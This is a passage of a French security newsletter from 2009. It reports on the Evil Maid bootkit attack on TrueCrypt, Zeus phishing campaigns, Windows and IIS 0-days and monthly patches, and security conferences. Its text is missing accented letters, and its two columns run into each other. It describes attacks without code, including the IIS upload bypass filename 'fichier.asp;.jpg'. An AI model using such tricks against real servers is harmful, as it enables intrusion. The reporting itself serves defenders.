La faille de scurit vient du fait que mme si la totalit


dun disque dur est chiffr par un logiciel tel que
TrueCrypt, lensemble des instructions contenues au
sein du MBR est en clair (le Master Boot Record est un
emplacement ou est stock le Boot Loader). Il est alors
WWW.XMCOPARTNERS.COM

Grce ce systme, un utilisateur ayant un accs possible de les remplacer pour excuter du code non
physique ou distant la machine ne pourra alors pas dsir (ce que plusieurs virus ont dailleurs fait par le
en principe accder aux donnes contenues au sein de pass) ou simplement modifier le code existant pour
ce disque dur chiffr sans possder le mot de passe stocker des informations
(passphrase). Les techniques classiques consistant
dmarrer depuis un LiveCD (systme dexploitation Pour effectuer cette manipulation, le logiciel doit, soit
contenu sur un CD/DVD/cl USB) ne seront alors tre excut sur le systme dexploitation par un
daucune utilit puisque les donnes sont chiffres. utilisateur possdant des privilges dadministration,
soit tre install partir dun LiveCD, ce qui implique un
Ce systme semble trs peu contraignant pour les accs physique la machine.
utilisateurs dsirant protger des informations Peter Kleissner a mis disposition un Framework Open
sensibles. Mais est-ce rellement scuris? Source contenant notamment le programme

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [30]
ACTUALITE : L'ATTAQUE EVIL MAID LACTU SCU N24

Infector.exe permettant de placer un malware au sein L'attaque Evil Maid


du MBR.
Dernirement, ce sont les chercheurs dInvisible Things
Ces deux mthodes dexploitation avaient lpoque Labs qui se sont intresss la question et se sont
suscit la polmique puisque les quipes de TrueCrypt penchs sur la mise en place de lexploitation dune
indiquaient lauteur avant sa prsentation quelles attaque lgrement diffrente.
ntaient pas responsables des actions effectues par
un utilisateur malveillant ayant un accs physique une Ils ne vont pas installer un malware au sein du systme
machine ou le fait quun systme dexploitation soit dexploitation, mais vont rcuprer la passphrase de
compromis depuis un compte administrateur limitait TrueCrypt saisie chaque dmarrage par lutilisateur.
cette attaque. Cette opration peut tre effectue en seulement
quelques minutes mais ncessite un accs physique au
Sachant que prs de 75% des utilisateurs utilisent leur poste en question.
systme avec des privilges dadministration, cette
attaque peut faire froid dans le dos Pour cela, ils ont mis disposition une image disque
nomm Evil Maid permettant de gnrer un petit
systme dexploitation sur une cl USB.

INFO
Le nom Evil Maid fait rfrence aux personnes qui
pourraient raliser ce type d'attaque savoir le
personnel de nettoyage (qui sont pratiquement les
Stoned Bootkit disponible sous plusieurs seules avoir accs toutes les pices d'une
entreprise!).
supports
Une fois la cl USB gnre, lattaquant doit dmarrer
Lauteur du programme Stoned Bootkit depuis celle-ci partir du poste contenant le disque dur
continue toujours le dveloppement de chiffr.
son Framework afin doffrir au fur et
mesure de nouvelles fonctionnalits.

Alors que Stoned Bootkit ntait


disponible que sous la forme dun
programme excutable lors de sa
prsentation, lauteur a maintenant mis
disposition un fichier PDF exploitant
la faille de scurit getIcon
(CVE-2009-0927), permettant lexcution
du programme ds la visualisation du
fichier malicieux via une visionneuse
PDF Adobe Reader non mis jour.

Un LiveCD est galement disponible pour


mener une attaque physique et changer
le code dans le MBR sans interaction
avec lutilisateur. Le programme plac sur la cl USB modifie alors le
code plac dans le MBR (Master Boot Record) afin de
WWW.XMCOPARTNERS.COM

capturer la passphrase quentrera la prochaine fois


lutilisateur au prochain dmarrage.

Aprs quelque temps, lattaquant devra dmarrer une


nouvelle fois sur le poste compromis partir de la cl
USB afin de pouvoir rcuprer la passphrase utilise
par lutilisateur.
Cette attaque pourrait mme aller encore plus loin en
envoyant au travers dun email par exemple, la
passphrase ds quelle est capture.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [31]
ACTUALITE : L'ATTAQUE EVIL MAID LACTU SCU N24

Une fois le mot de passe rcupr, il est alors possible


de lire, modifier ou encore supprimer lensemble des
fichiers stocks sur le disque dur

Conclusion

Les logiciels tels que TrueCrypt permettent de protger


efficacement les donnes dun utilisateur. Mme si des
attaques ont vu rcemment le jour, celles-ci sont
limites et ne peuvent pas toujours tre ralises en
fonction des lourds pr-requis quelles ncessitent.

Rfrences :

http://www.blackhat.com/html/bh-usa-09/bh-usa-09-
archives.html#Kleissner

http://www.stoned-vienna.com/

http://theinvisiblethings.blogspot.com/2009/10/evil-
maid-goes-after-truecrypt.html

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [32]
Zeus, Phishing ... ... et social engineering

Depuis le dbut du mois doctobre, de nombreuses


attaques de Phishing sont menes par un ou plusieurs
groupes de pirates. Dans un premier temps, ces
attaques taient simples et facilement identifiables,
elles deviennent dsormais de plus en plus
sophistiques et donc dangereuses pour les entreprises
comme pour les particuliers.
Ces pirates tentent actuellement de dvelopper un
botnet nomm Zeus , en lanant massivement ces
emails de Phishing.
Revenons au dbut du mois, o des milliers demails
ont t envoys sur Internet.

On commence par une nouvelle configuration


pour Outlook Web Access...

Lattaque utilise des caractristiques prcises de sa


victime (ici notre nom de domaine xmcopartners.com)
en ajoutant un suffixe exotique .vvorip.co.uk. Il est
intressant de noter que nimporte quel nom devant le
domaine vvorip.co.uk redirige vers le mme site. On
notera leffort particulier des pirates qui insrent dans la
Lemail ressemble ici tous les SPAM classiques : un page web malicieuse le nom de lentreprise cible.
virus attach en pice jointe ( "install.zip"). Ce fichier
est un malware plus connu sous le nom de "Zeus", un
malware de type banker , cest--dire capable de
voler les identifiants des sites bancaires visits par ses
victimes.

Quelques jours, plus tard, d'autres emails du mme


type sont envoys. Cette fois-ci, un lien est insr au
sein du corps de lemail. Ce lien renvoie vers un site
aux allures d'une webmail Outlook Web Access qui
WWW.XMCOPARTNERS.COM
propose de tlcharger une mise jour Outlook.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [33]
ACTUALIT : ATTAQUES DE PHISHING L'ACTU SCU N24

...on continue par une mise jour Outlook L'excutable propos (Officexp-KB910737-FullFile-
Express... ENU.exe) est toujours une variante du malware "Zbot"
qui permet de voler les mots de passe des victimes.

Quelques jours plus tard, un email relativement


similaire, mais beaucoup plus professionnel s'est

INFO
galement retrouv dans notre boite mail...

Le nouvel email utilis est envoy partir de l'adresse


"noreply@microsoft.com" (Microsoft Update Center Des variantes de Zbot non dtectes par virus
comme expditeur) et propose galement une mise total
jour du logiciel Outlook.

La qualit de l'email est remarquable, des couleurs Tous les excutables tlchargs depuis
jusqu'au nom de domaine, aucun lment n'est choisi ces sites malicieux ont t tests
auprs de Virustotal qui ralise une
au hasard afin d'viter la suspicion des futures victimes.
analyse antivirale avec tous les
antivirus du march...

Rsultat : entre 20% et 40% des binaires


envoys sont dtects par les antivirus.

Un lien pointe vers le nom de domaine "http://


update.microsoft.com.okkkikkl.eu" toujours aux allures D'autres variantes ne sont pas du tout
du vritable site de Microsoft. reconnues ce qui laisse imaginer le taux
de russite de l'attaque...

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [34]
ACTUALIT : ATTAQUES DE PHISHING L'ACTU SCU N24

...on recommence avec une mise jour des ...on finit par du FTP !
clients mail et des navigateurs...
Enfin, la dernire attaque en date cible les logins et les
Toujours dans le mme genre, une autre campagne de mots de passe de serveurs FTP.
SPAM a encore attir notre attention. Cette fois-ci ce
sont les navigateurs et les clients mail qui devaient tre Les pirates utilisent toujours le domaine de l'adresse du
mis jour.. destinataire de l'email et proposent de suivre un lien
pointant vers une interface d'administration cPannel.

Cette page web demande alors de confirmer les


identifiants FTP...

Les pirates ont galement pollu quelques blogs et


forums afin de faire passer leur message.

Conclusion

Avec cette capacit personnaliser et produire des


emails de phising aussi bien ficels, il est certain que le
botnet Zeus va faire parler de lui dici plusieurs
WWW.XMCOPARTNERS.COM

semaines. Un tel botnet pourrait servir lancer des


attaques massives de type DDoS et voler des mots
de passe (banques, ebay).

Webographie

[1] http://www.symantec.com/connect/blogs/phishing-
wave-sniff-ftp-credentials

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [35]
L'ACTU SCU N24
Microsoft, 0-day et patch de scurit...

...Ctait mon ide!

se propager dans les rseaux. Mais il faut rappeler que


Les vulnrabilits 0-day : SMBv2 cette vulnrabilit impacte les systmes Windows Vista
SP2 qui sont encore peu rpandus dans les milieux
Au cours du mois de septembre, une vulnrabilit 0-day professionnels.
a t dcouverte au sein du protocole SMB v2 par
Laurent Gaffi [1]. Cette annonce, accompagne dune
preuve de concept provoquant un dni de service, cra
un buzz dans le milieu de la scurit informatique.

La vulnrabilit rsidait dans le traitement de requtes


NEGOTIATE PROTOCOL et plus prcisment de
INFO
lentte Process ID High. Windows 7 out!
Trs rapidement, Kostya Kortchinksy, expert reconnu Le nouvel OS tant attendu est enfin
dans le milieu de la scurit informatique affirma que disponible. Aprs une campagne de pub,
cette vulnrabilit tait exploitable. Aprs deux jours de euh, comment dire ... orginale,
recherche, Kostya arriva exploiter la vulnrabilit Microsoft espre conqurir les
localement. particuliers (un peu forcs) et sduire
Microsoft publia dans le mme temps une alerte et les entreprises.
proposa quelques jours plus tard une solution de
protection temporaire. D'un point de vue de la scurit,
Windows 7 dispose d'un centre de
Une dizaine de jours aprs lannonce de la vulnrabilit, scurit qui rsume l'tat de la
configuration, et prvient
Kostya annonca dtenir un exploit fonctionnel
l'utilisateur ds qu'un problme est
permettant de prendre le contrle distance dun dtect (dsactivation du pare-feu,
systme reposant sur Windows Vista. Cependant, cet mises jour, antivirus obsolte,
exploit ntait disponible que dans le framework etc.). D'autre part, le User Account
dexploitation priv : Canvas. Cet exploit constituait le Control (UAC) est moins prsent sous
Saint-Graal de tout crateur de vers. Windows 7. D'autres outils de scurit
ont galement t intgrs par dfaut :
le nouvel antivirus Windows Defender,
un programme de contrle parental,
ainsi qu'un pare-feu.

WWW.XMCOPARTNERS.COM

Les vulnrabilits 0-day : Internet Explorer

En la fin du mois de novembre, une preuve de concept


provoquant un dni de service sur le navigateur Internet
Explorer a t publie dans les listes de diffusions
Il aura faillu attendre 2 semaines pour que Laurent seclist [3]. Cette vulnrabilit provient de la mthode
Gaffi, lauteur de la dcouverte cre un module Javascript getElementByTagName qui est utilise
dexploitation fiable pour le framework public Metasploit. lors de la rcupration dobjets CSS.

Lors de la rdaction de cet article, un module


Avec du recul, cette vulnrabilit fit plus de bruit que de dexploitation fiable tait en cours de cration.
dgts. En effet, on craignait qu'un nouveau vers de
type Conficker ne tire profit de cette vulnrabilit pour

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [36]
ACTUALIT DU MOIS : MS, CORRECTIFS ET 0-DAY L'ACTU SCU N24

Vulnrabilits 0-day : SMB again ! Vulnrabilits 0-day : IIS et les extensions

Laurent Gaffi, publia en novembre, une nouvelle Enfin, le dernier "0-day" du moment a t publi la fin
vulnrabilit prsente au sein des clients SMB [2]. du mois de dcembre par le chercheur Soroush Dalili
Egalement accompagne dune preuve de concept [16].
provoquant le dni de service, cette annonce visait la Cette vulnrabilit importante, dcouverte en avril 2008,
dernire monture de Microsoft : Windows 7. affecte les serveurs web IIS et plus particulirement la
gestion du caractre ";" au sein d'extensions des
La vulnrabilit affecte aussi bien la version 1 que la fichiers ASP. En effet, IIS interprte les fichiers finissant
version 2 du protocole SMB. La faille provenait dune par l'extension ".asp;.jpg" (ou toute autre extension la
boucle infinie gnre par une longueur incorrecte dans place de JPG) comme un fichier ASP.
lentte NetBIOS dun paquet de rponses.
Lorsqu'une application web implmente une fonction
Pour exploiter cette faille, un attaquant doit inciter une d'upload de fichiers et filtre les extensions, l'application
victime a se connecter un partage SMB provoquant la considre les fichiers ayant un nom du type
boucle infinie. "toto.asp;.jpg" comme des fichiers JPEG.
Cependant, IIS traite ces fichiers comme des fichiers
Pour ce faire, grce aux fonctionnalits du navigateur ASP et les passe l'interprteur ASP ("asp.dll").
Internet Explorer, il suffit que lattaquant insre un lien
dans une page web rcupre par la victime et qui Ainsi, si un pirate parvient uploader un fichier de la
pointe vers le partage SMB malicieux. forme "fichier.asp;.jpg" sur un serveur IIS, ce dernier
peut contourner les filtres mis en place et dposer un
fichier ASP malicieux. Il pourrait par la suite intragir
avec le systme d'exploitation avec les droits du

EN CHIFFRES
serveur IIS si toutefois les droits dexcution sont
activs dans le dossier de rception.

Selon l'auteur, 70% des sites les plus connus bass sur

34
IIS seraient vulnrables cette vulnrabilit.

Nombre de vulnrabilits corriges


au mois doctobre. Ce nombre constitue
le record en nombre vulnrabilits
corrig par Microsoft lors dun Patch
Tuesday.

2003
Les patchs Tuesday existent depuis 6
ans. Avant 2003, les patchs ntaient
WWW.XMCOPARTNERS.COM
pas correctement tests et il tait
frquent que lapplication dun patch
soit plus problmatique que la
vulnrabilit en elle-mme.

La vulnrabilit a t confirme sur les systmes


745 Windows 2003 R2 avec IIS 6 mais d'autres versions
pourraient galement tre vulnrables.
Nombre de vulnrabilits corriges Les serveurs IIS implmentant .NET ne sont pas
par les 400 bulletins Microsoft depuis vulnrables cette attaque.
la cration des Patch Tuesday.
Microsoft a ragit rapidement et prvoit de corriger
cette vulnrabilit prochainement (voir cadre INFO
page 38).

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [37]
ACTUALIT DU MOIS : MS, CORRECTIFS ET 0-DAY L'ACTU SCU N24

Les correctifs de novembre 2009

INFO
6 correctifs ont t publis au mois de novembre.

MS09-063 : Une vulnrabilit au sein du composant


Microsoft ragit sur la vulnrabilit IIS Web Services On Devices API (WSDAPI)
permettait un attaquant dexcuter du code arbitraire
distance [4].
C'est par le biais du blog du "Microsoft
Security Response Center" (MSRC), qu'on MS09-064 : Le service denregistrement de licences
apprend que Microsoft est en train
permettait de prendre le contrle distance dune
d'analyser la dernire vulnrabilit
machine disposant de Windows 2000 [5].
affectant IIS.
MS09-065 : une vulnrabilit au sein de la gestion des
D'aprs leurs premiers rsultats, le
serveur web IIS n'est pas vulnrable dans polices Embedded OpenType (EOT) permettait un
sa configuration par dfaut. Un attaquant attaquant de prendre le contrle du systme dun
devrait tre authentifi et avoir un accs utilisateur ouvrant un document Office malicieux ou
en criture sur le serveur web avec les visitant une page web spcialement conue [6].
droits d'excution, ce qui ne correspond
pas aux meilleures pratiques [2] et aux MS09-066 : une vulnrabilit au sein du service
recommandations fournies par Microsoft pour dannuaire Active Directory, ADAM et AD LDS
scuriser un serveur. permettait un attaquant de provoquer un dni de
service [7].
Une fois la vulnrabilit compltement
dcortique, un correctif pourrait voir le MS09-067 et MS09-68 : plusieurs vulnrabilits
jour lors du "Patch Tuesday", ou en tant importantes au sein de la suite bureautique Microsoft
que correctif "hors-cycle". Office permettaient un attaquant de prendre le
contrle dun systme lorsquun utilisateur ouvrait un
D'aprs Microsoft, aucune exploitation
fichier malicieusement conu. Le patch MS09-67
massive de cette vulnrabilit n'a encore
eu lieu. concerne plus prcisment Microsoft Office Excel [8]
alors que MS09-68 concerne Microsoft Office Word
Les liens suivants donnent les lments [9].
pour configurer un serveur de manire
scurise.
http://technet.microsoft.com/en-us/library/ Les correctifs de dcembre 2009
cc782762(WS.10).aspx
6 correctifs ont t publis au mois de dcembre.
http://technet.microsoft.com/en-us/library/
cc756133(WS.10).aspx MS09-069 : Le service LSAS(Local Security Authority
Subsystem Service) ne traitait pas correctement
http://msdn.microsoft.com/en-us/library/ certaines messages ISAKMP malforms ce qui
ms994921.aspx permettait un utilisateur authentifi d'puiser les
ressources du systme et provoquer un dni de service
https://blogs.sans.org/appsecstreetfighter/ [10].
2009/12/28/8-basic-rules-to-implement-
WWW.XMCOPARTNERS.COM

secure-file-uploads/ MS09-070 : Plusieurs vulnrabilits du service ADFS


(Active Directory Federation Service) ont t corriges.
Le service ADFS permet d'utiliser l'authentification
unique (SSO) Windows pour authentifier les utilisateurs
auprs d'applications Web multiples et connexes
pendant la dure d'une session de connexion.

La premire vulnrabilit provient plus prcisment d'un


manque de contrle au niveau de la gestion des
sessions de la part d'ADFS. Sur les systmes avec
accs partag, tels que les bornes Internet, un
attaquant pouvait accder aux ressources d'un autre
utilisateur qui se serait authentifi auparavant. En

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [38]
rutilisant des donnes spcifiques dans le cache du l'optique de prendre le contrle du systme sous-jacent
navigateur (jeton d'authentification), un attaquant avec les droits de l'utilisateur courant [14].
pouvait alors s'authentifier dans l'application Web
implmentant l'authentification unique ADFS. Cette MS09-074 : Enfin la dernire faille du mois concernait le
attaque pouvait tre uniquement excute pendant la logiciel Microsoft Project. L'ouverture de fichiers
dure de la session configure par l'administrateur malforms permettait un pirate de prendre le contrle
ADFS (par dfaut 600 minutes). d'un systme vulnrable [15].

La seconde vulnrabilit tait due la validation Rfrences :


incorrecte d'en-ttes de requte lorsqu'un utilisateur
authentifi se connectait un serveur web avec ADFS [1] http://g-laurent.blogspot.com/2009/09/windows-
activ. Un attaquant authentifi pouvait exploiter cette vista7-smb20-negotiate-protocol.html
vulnrabilit en envoyant une requte HTTP
spcialement conue, afin d'excuter du code [2] http://g-laurent.blogspot.com/2009/11/windows-7-
malveillant sur le serveur ayant le service ADFS activ. server-2008r2-remote-kernel.html
L'attaquant pouvait ainsi excuter certaines actions sur
le systme avec les mmes droits que ceux allous au [3] http://seclists.org/bugtraq/2009/Nov/148
service IIS (par dfaut, le compte du service rseau)
[11]. [4] http://www.microsoft.com/technet/security/bulletin/
ms09-063.mspx
MS09-071 : Deux vulnrabilits du serveur Microsoft
IAS (Internet Authentication Service, le serveur RADIUS [5] http://www.microsoft.com/technet/security/bulletin/
de Microsoft) pouvaient tre exploites par un pirate ms09-064.mspx
envoyant des demandes d'authentification avec les
protocoles PEAP et MS-CHAP v2 [6] http://www.microsoft.com/technet/security/bulletin/
ms09-065.mspx
Ces vulnrabilits taient exploitables distance sur les
serveurs Windows 2008 et permettent, soit de [7] http://www.microsoft.com/technet/security/bulletin/
contourner l'authentification avec le protocole MS- ms09-066.mspx
CHAP v2, soit d'injecter un code malicieux si le serveur
accepte les requtes PEAP. [8] http://www.microsoft.com/technet/security/bulletin/
ms09-067.mspx
Ces vulnrabilits permettaient galement une
excution de code distance si des messages reus [9] http://www.microsoft.com/technet/security/bulletin/
par le serveur du service d'authentification Internet ms09-068.mspx
taient copis de faon incorrecte dans la mmoire lors
du traitement des tentatives d'authentification PEAP. Un [10] http://www.microsoft.com/technet/security/
attaquant qui parviendrait exploiter l'une de ces bulletin/ms09-069.mspx
vulnrabilits pouvait prendre le contrle d'un systme
affect. Les serveurs utilisant le service [11] http://www.microsoft.com/technet/security/bulletin/
d'authentification Internet sont uniquement concerns ms09-070.mspx
lors de l'utilisation de l'authentification PEAP avec MS-
CHAP v2 [12]. [12] http://www.microsoft.com/technet/security/
WWW.XMCOPARTNERS.COM

bulletin/ms09-071.mspx
MS09-072 : Cette mise jour corrigeait 5 vulnrabilits
au sein d'Internet Explorer. Une de ces vulnrabilits a [13] http://www.microsoft.com/technet/security/
d'ailleurs fait l'objet d'une attaque. La page malicieuse bulletin/ms09-072.mspx
exploitait un dbordement de tampon lors du traitement
d'objets CSS/STYLE lors de l'appel de la fonction [14] http://www.microsoft.com/technet/security/
getElementsByTagName() [13]. bulletin/ms09-073.mspx

MS09-073 : La faille de scurit corrige par ce [15] http://www.microsoft.com/technet/security/


correctif rsultait d'un problme de conversion lors du bulletin/ms09-074.mspx
traitement des fichiers au format Word 97. En incitant
un utilisateur ouvrir un fichier Word (au format Word [16] http://soroush.secproject.com/downloadable/iis-
97) avec la suite Office ou l'diteur de texte WordPad, semicolon-report.pdf
un pirate pouvait excuter un code malicieux dans

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [39]
L'ACTU SCU N24

Les confrences
Scurit : GSDAYS,
MILIPOL ET C&ESAR

Milipol 2009 C&ESAR

Pour la 16e dition des C&ESAR, la DGA CELAR a


XMCO tait prsent la 16e dition du salon Milipol choisi le thme de la scurit des technologies sans fil.
Paris. Ce salon mondial de la scurit intrieure des Malheureusement, nous navons pu assister qu la
tats sest tenu du 17 au 20 novembre 2009, Paris premire journe, qui annonait nanmoins
Porte de Versailles. d'excellentes confrences !

Comme son nom et sa dfinition le laissaient


prsager, ce salon est trs orient militaire et police
, avec une trs petite place faite la scurit
informatique.
De nombreuses armes taient prsentes, allant de
tonfa nouvelle gnration , jusquau fusil sniper
longue distance vise laser (trs impressionnant),
en passant par la mitrailleuse de Rambo .
Les vhicules ntaient pas en reste avec des Segway
et des Trikke uPT (sorte de trottinette lectrique trois
roues) aux couleurs de la police, ainsi que dautres
vhicules plus conventionnels.
De mme, diffrentes tenues taient exposes :
tenues de protection contre des attaques chimiques, L'introduction mene par M.Butti (R&D Orange Labs) a
tenues de dmineurs, gilets par balle, etc. permis de mettre tout le monde dans le bain en
Outre ce ct combat du salon, une facette plus rappelant les problmes de scurit des rseaux
subtile tait galement prsente avec divers appareils 802.11 et les volutions depuis 97 jusqu' aujourd'hui :
ddis au renseignement et la collecte l'volution des normes pour les particuliers comme pour
dinformation : micros dcoute miniatures, suite les entreprises, les problmes d'implmentations et la
doutils forensic, appareils de communication et dcouverte de failles...
dobservation, drnes, etc.
Cette confrence ft suivie par une excellente
Bien que ce salon tait clairement consacr la prsentation de la scurit des rseaux Wifi avec
scurit physique, il nen tait pas moins intressant... l'expert du domaine M.Cdric Blancher (EADS). Ses
noter que ces derniers taient parmi les rares a explications ont permis tous de comprendre les rels
avoir un stand orient scurit informatique... problmes de scurit, du WEP en passant par le WPA
et la fameuse vulnrabilit TKIP.
En quelques mots, un speech, clair prcis sur un sujet
plus que matris... WWW.XMCOPARTNERS.COM
Par la suite Matteo Cypriano de l'universit de Franche-
Compt nous prsenta une solution de golocalisation
par Wifi : OWLPS. Bien qu'au stade dexprimentation,
le systme OWLPS semble prometteur et peut dj
rivaliser avec certaines solutions commerciales.

M.Henri Gilbert (Orange Labs) prsenta le panel de la


scurit des rseaux UMTS en pointant les attaques et
les mcanismes de protection implments par les
oprateurs. Gnralement, les protections mises en
place ne servent qu'a rendre les attaques plus difficiles.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [40]
ACTUALIT DU MOIS : LES CONFERENCES SECURITE L'ACTU SCU N24

Enfin, Christophe Rault, du CELAR, a prsent des Confrence plnire


fake hotspots et leurs consquences associes.
Ce colloque a dbut avec une intervention de Franck
La prsentation sest droule sous la forme d'une Veysset, reponsable du CERTA. Ce dernier a
dmonstration, de la mise en place du hotpost jusqu notamment expos le rle du CERTA dans l'analyse
la prise de contrle du poste de la victime. des incidents avec notamment la prsentation des
actions menes aprs une attaque de DDoS ayant
Dans un premier temps, le pirate et la victime se touch une administration franaise, et dont lenqute
trouvant sur le mme rseau, le pirate ralisait une est toujours en cours.
attaque de type MITM (arp poisonning) et pouvait ainsi
en utilisant SSLStrip (cf article) capturer les identifiants Une intervention de Richard Guidoux, RSSI de
d'un utilisateur qui se connectait navement sur un site Carrefour Hypermarchs, et gagnant du Jeu
bancaire par le biais du protocole HTTP. Dcryptage 2009 de Global Security Mag a suivi sur
le thme de La Scurit au Service des Mtiers .
Par la suite, toujours en utilisant une attaque MITM, le
pirate pouvait exploiter une vulnrabilit intrinsque au
navigateur et ainsi prendre le contrle du systme de la
victime pour installer un certificat racine factice.
L'attaquant n'avait par la suite qu'a utiliser SSLSniff
pour signer la voler les certificats de sites bancaires
(par exemple) avec le certificat racine qu'il venait
d'installer au sein du systme de la victime.

Cette prsentation, la plus illustre de la journe, tait


trs agrable suivre et tait minutieusement prpare.

GS DAYS 2009

Deux consultants XMCO ont assist cette premire


dition des Journes Francophones de la Scurit
organise par le magazine Global Security Mag. Ce Les Webshells, vritables menaces pour les SI?
colloque sest droul le 1er dcembre aux Palais des
Arts et des Congrs dIssy-les-Moulineaux. Rsum Cette confrence a t faite par Renaud Dubourguais,
des confrences comme si vous y tiez! consultant du cabinet HSC. Aprs un court rappel sur
les tests dintrusion et les attaques web, Renaud
Dubourguais a fait une dmonstration complte de
dploiement et dexploitation dun webshell (page web
permettant d'interagir avec le systme) : localisation
dune interface dadministration, compromission via un
compte trivial, upload du webshell. WWW.XMCOPARTNERS.COM

Ce webshell, issu dun projet interne HSC, permettait


la compromission du serveur, ainsi que la dcouverte
du rseau interne de lentreprise grce lintgration
dun scanner TCP dans le webshell lui-mme. Ce
dernier permettait galement de rebondir dans le
rseau interne pour, par exemple, obtenir une session
Terminal Server sur un Windows 2008 via un tunneling
HTTP des connexions.

Cette excellente confrence sest termine par des


conseils, comme par exemple sensibiliser les
dveloppeurs, faire des audits de code, modifier les
configurations par dfaut ou encore minimiser les droits
associs aux services lancs.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [41]
ACTUALIT DU MOIS : LES CONFERENCES SECURITE L'ACTU SCU N24

Le monde devient-il plus sr? Phishing, Pharming, Clickjacking, In Session


Phishing, et ... Botnets, comment sengluer dans
Telle tait la question pose par Nicolas Ruff. Cette la toile?
confrence destination des RSSI ntait pas
technique, mais non moins intressante. Cette confrence prsente par Grard Peliks du
CyberSecurity Center de EADS, tait plutt classique.
Comme son habitude, Ruff a exprim clairement son Au programme, explications suivies de dcorticage
point de vue sur lchec de la scurit informatique dattaques rcentes (entre autres, des attaques de
dans notre monde actuel avec des anecdotes toujours phishing ayant usurp certaines administrations
originales (mais d'o tient-il ces info??!!) franaises).

Attaques sur les Web Services

Renaud Bidou, expert en scurit de la socit DenyAll,


a commenc par dcortiquer les web services
(historique, composants, technologies, etc...). Ce
dernier a ensuite continu par des explications et des
dmonstrations dattaques sur les web services :
Injection XML, Evasion, Injection XPath, etc...
La conclusion de cette confrence navait rien de bien
rassurant : les web services sont partout, vulnrables,
et les attaques sont connues... Nanmoins, encore faut-
il savoir les mettre en oeuvre et les exploiter
correctement !
Webshag/MySQLat0r

Aprs du thorique, place la technique avec une Juste une imprimante?


prsentation sur deux outils utiliss lors de tests
d'intrusion web. Cette confrence prsente par Tibault Koechlin et
Jean Baron, deux experts de NBS System tournaient
Le premier, baptis Webshag, est une amlioration du autour des imprimantes
clbre nikto qui possdait quelques lacunes en entreprise, et plus
notamment pour le traitement des faux positifs. gnralement des MFD
Le second, nomm MySQLat0r permet de mener une , pour Multi Functionnal
injection SQL. Rien de bien nouveau pour les experts Device. Ces derniers ont
dans ce domaine... compltement compromis
une imprimante Dell (en
fait une imprimante
Lexmark rebrande). Au
menu : exploitation de
stack overflow, reverse
engineering, modification
WWW.XMCOPARTNERS.COM
hardware et bien sr
rootage!

Un travail rondement
men et certainement
Authentification forte au sein dune banque laborieux pour arriver tel rsultat! Bravo aux auteurs
de ces recherches qui auraient mrit une place la
Alain Roux de la socit Edelweb nous a fait part de Black Hat.
son retour d'exprience sur l'implmentation de
mthodes d'authentification forte au sein d'une banque
d'investissements. Contraintes techniques et Conclusion
organisationnelles.
En conclusion, une trs bonne premire dition qui a
permis de concilier technique et stratgie et ainsi
intresser consultants et managers.
Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est
strictement interdite. [42]
L'ACTU SCU N24

BLOGS, LOGICIELS ET Nos bookmarks et extensions favoris

EXTENSIONS Chaque mois, nous vous prsentons,


dans cette rubrique,
libres, extensions
des outils
Firefox ou
encore nos sites web prfrs.

Ce mois-ci nous avons choisi de


vous prsenter deux sites web et
une extension Firefox utile pour
les pentesteurs.

XMCO | Partners

Au programme de ce mois :

Zdnet Security (Zero Day) : blog ddi la scurit avec des informations analyses par Ryan Naraine et Dancho
Danchev

SSLLabs : anayse des caractristiques SSL

Backend Software Informations : identification des CMS utiliss

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [43]
L'ACTU SCU N24

Zdnet security
Ryan Naraine et Dancho Danchev

Description Depuis quelques mois, le site Zdnet a ouvert une rubrique ddie
la scurit informatique. Baptise Zero Day, cette rubrique regroupe
toutes les informations d'actualit lies la scurit informatique.

Chaque jour, plusieurs news sont analyses par deux chercheurs en


scurit renomms Ryan Naraine et Dancho Danchev ce qui permet
tous de suivre les grandes tendances de la scurit informatique.

Capture dcran

Adresse Ce blog est accessible depuis les URLs suivantes :


Site web :
http://blogs.zdnet.com/security/

Flux RSS :
feed://feeds.feedburner.com/zdnet/zdsecurity

Avis XMCO Parmi les nombreux blogs/sites web ddis la scurit


WWW.XMCOPARTNERS.COM

informatique, Zero Day est un des blogs les plus complets (au mme
titre que Heise Security prsent dans un ancien numro).

En suivant le flux RSS et les quelques post publis chaque jour,


vous garderez un oeil sur l'actualit de la scurit. Vulnrabilits,
attaques, informations diverses, bref une source d'information riche
et fiable!

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [44]
L'ACTU SCU N24

SSLLabs
Tester simplement votre serveur web

Description Afin de compltez cet article sur SSL, il parat essentiel de fournir
quelques pistes permettant de connatre exactement les
caractristiques de son serveur web.
SSL Labs propose ce service gratuitement et permet, en quelques
clics, d'avoir une vision prcise de la configuration SSL
implmente : longueur des des cls de chiffrement, validit du
certificat, protocoles supports... et la rengociation SSL au coeur
de tous les dbats...

Capture dcran

Adresse SSLLabs est accessible depuis l'URL suivante :


https://www.ssllabs.com/ssldb/

WWW.XMCOPARTNERS.COM

Avis XMCO SSLLabs n'a rien de rvolutionnaire mais permet aux managers de
vrifier, en un coup d'oeil, que tout est en place. Une note donne
immdiatement le niveau de confiance du certificat de quoi alimenter
les tableaux de bords de nos chers RSSI...!

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [45]
L'ACTU SCU N24

Backend Software Informations


Identification des CMS utiliss

Description Il arrive souvent que les dveloppeurs se basent sur des CMS afin
de dvelopper leurs applications. Lors de tests d'intrusion, il arrive
frquemment de tomber sur des CMS camoufls dont l'identification
n'est pas toujours vidente ou fastidieuse.

Backend Software Information est une extension utile pour les


